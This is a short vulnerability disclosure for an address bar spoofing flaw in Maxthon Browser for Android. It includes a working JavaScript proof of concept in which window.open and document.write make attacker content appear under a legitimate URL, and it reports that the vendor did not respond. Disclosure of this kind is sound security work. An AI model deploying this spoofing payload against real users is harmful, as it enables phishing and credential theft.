Product: Maxthon Browser
#Vulnerability: Address Bar Spoofing Vulnerability
#Impact: Moderate
#Authors: Rafay Baloch
#Company: RHAinfoSEC
#Website: http://rafayhackingarticles.net
*Introduction*
Maxthon browser for Android was prone to an "Address Bar Spoofing"
vulnerability wdue to mishandling of javaScript's window.open function
which is used to open a secondary browser window. This could be exploited
by tricking the users into supplying senstive information such as
username/passwords etc due to the fact that the address bar would display a
legitimate URL, however it would be hosted on the attacker's page.
*POC*
Following is the POC that could be used to reproduce the issue:
<script> document.getElementById('one').onclick = function() {
myWindow=window.open('http://rafayhackingarticles.net/','RHA','width=300,height=300,location=yes');
myWindow.document.write("<html><head></head><body><b>This page is still
being hosted another domain, however the domain is pointing to
rafayhackingarticles.net.</b><br><br><iframe src=\"
http://www.rafayhackingarticles.net/\");></iframe></scri+pt></body></html>");
myWindow.focus(); return false; } </script>
*impact*
The issue could be abused to carry out more effective phishing attacks
against it's users.
*Fix*
We tried to contact the vendor several times however we did not recieve any
response